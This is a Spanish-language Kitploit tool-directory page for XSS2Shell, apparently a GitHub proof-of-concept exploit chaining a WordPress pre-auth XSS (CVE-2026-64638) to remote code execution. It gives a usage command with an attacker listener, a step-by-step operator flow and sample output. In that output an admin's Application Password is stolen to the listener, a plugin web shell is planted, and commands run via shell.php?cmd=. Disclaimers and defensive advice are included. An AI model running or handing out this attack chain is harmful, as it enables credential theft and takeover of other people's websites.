Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
XSS2Shell — Exploit PoC de XSS a RCE pre-autenticación en WordPress (xss2shell & CVE-2026-64638) | Kitploit
Herramientas/GitHubGitHub/wordsec/xss2shell
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubwordsec/xss2shell

XSS2Shell

Exploit PoC de XSS a RCE pre-autenticación en WordPress (xss2shell & CVE-2026-64638)

Ver Repositorio
7115hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

XSS2Shell

XSS2Shell es una prueba de concepto educativa para CVE-2026-64638, que demuestra el impacto de un problema de XSS pre-autenticación en instalaciones WordPress vulnerables. Con la participación explícita de un administrador, la PoC captura una Contraseña de aplicación de WordPress, publica una página temporal, sube un plugin de prueba y comprueba si el endpoint de shell resultante puede ejecutar un comando.

Antecedentes técnicos: WordPress Pre-Auth XSS to RCE: CVE-2026-64638

Solo educación y pruebas autorizadas. Ejecuta esta herramienta únicamente contra sitios WordPress que poseas o para los que tengas permiso por escrito para evaluar. No la uses para atacar a administradores de terceros ni sistemas de producción.

Requisitos

  • Python 3.7 o superior
  • Una instalación de prueba de WordPress accesible
  • Un administrador que pueda iniciar sesión en el objetivo y abrir la URL del atacante
  • Acceso de red desde el navegador del administrador a la dirección del listener
  • Sin paquetes Python de terceros

Uso

root@kitploit:~
python3 xss2shell_poc.py -t http://wordpress.research.local --lhost 192.168.1.227 --lport 8080 -c "whoami"

Opciones

OpciónObligatorioDescripción
-t, --targetSíURL base de WordPress, incluyendo http:// o https://
-c, --commandSíComando a ejecutar cuando el shell esté disponible
--lhostNoIP del listener para enlazar y anunciar; por defecto usa la IP LAN detectada
--lportNoPuerto del listener; 0 selecciona un puerto disponible aleatorio
--keepNoConserva los artefactos publicados en lugar de eliminar la página temporal

La URL del objetivo se normaliza automáticamente, por lo que la barra final es opcional.

Flujo del operador

  1. La herramienta comprueba que /wp-login.php es accesible y parece una página de inicio de sesión de WordPress.
  2. Inicia un listener HTTP local y muestra la URL del listener.
  3. El administrador autorizado inicia sesión en el objetivo y abre esa URL.
  4. El flujo del navegador solicita una Contraseña de aplicación y envía el resultado al listener.
  5. La PoC publica una página temporal del atacante usando las credenciales capturadas.
  6. La página sube el plugin de prueba con la sesión del administrador.
  7. La herramienta verifica shell.php y ejecuta el comando solicitado.

El listener debe ser accesible desde el navegador del administrador. Las reglas de NAT, cortafuegos, proxy, bloqueo de ventanas emergentes y contenido mixto pueden impedir que el flujo del navegador se complete.

Salida de ejemplo

root@kitploit:~
 __          __           _  _____           
 \ \        / /          | |/ ____|          
  \ \  /\  / /__  _ __ __| | (___   ___  ___ 
   \ \/  \/ / _ \| '__/ _` |\___ \ / _ \/ __|
    \  /\  / (_) | | | (_| |____) |  __/ (__ 
     \/  \/ \___/|_|  \__,_|_____/ \___|\___|
                                              
                                              
xss2shell & CVE-2026-64638 |  https://wordsec.net/ - Education Purpose Only


============================================================
[*] XSS2Shell starting ...
[*] Checking target: http://wordpress.research.local/wp-login.php
[+] Admin panel found: http://wordpress.research.local/wp-login.php
[+] Attacker server listening: 192.168.1.227:8080
[*] On the target website, the admin must open this page and log in:
    ->  http://wordpress.research.local/wp-login.php
[*] Then the admin opens the link that was sent to them:
    ->  http://192.168.1.227:8080/
[*] Waiting for the admin to visit (Ctrl+C to stop) ...
[+] Child popup document initialized
[+] Popup window ready, XSS payload prepared
[+] Application Password saved to xss2shell_creds.json for later runs (shell: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php)
[+] XSS payload POSTed to wp-login.php
[+] Application Password stolen: user=admin pass=3SGS Loba 2Txw EzWz EbZC xZst (saved to xss2shell_creds.json)
[+] Attacker page published: http://wordpress.research.local/xss2shell-1786125273210/
[+] Plugin ZIP upload request sent with the victim's session
[+] Shell reachable: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php

============================================================
[+] Command output:
www-data
============================================================
[*] Cleanup: published page deleted (id=61)
[*] Cleanup: Application Password, plugin shell, and saved credentials preserved

[+] Shell link: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php?cmd=whoami
[+] Done.

Artefactos y limpieza

Las ejecuciones exitosas guardan la Contraseña de aplicación capturada en xss2shell_creds.json para reutilizarla en ejecuciones posteriores. La página publicada temporalmente se elimina automáticamente después del comando a menos que se use --keep.

El plugin de prueba, el endpoint de shell, la Contraseña de aplicación y las credenciales guardadas se conservan intencionadamente en la PoC actual. Elimínalos manualmente del sitio de prueba después de una evaluación autorizada y borra xss2shell_creds.json localmente.

Trata el archivo de credenciales como sensible y nunca lo subas al control de versiones.

Guía defensiva

  • Actualiza WordPress a una versión que no esté afectada por CVE-2026-64638.
  • Exige autenticación sólida de administrador y habilita la 2FA.
  • Restringe la instalación de plugins y la creación de contraseñas de aplicación a roles de confianza.
  • Revisa las Contraseñas de aplicación de los administradores, las páginas publicadas y los plugins instalados recientemente después de las pruebas.
  • Supervisa y bloquea solicitudes inesperadas a los endpoints de carga de plugins y REST.

Licencia

Usa la licencia incluida en este repositorio.

Hecho por WordSec

Descargar herramienta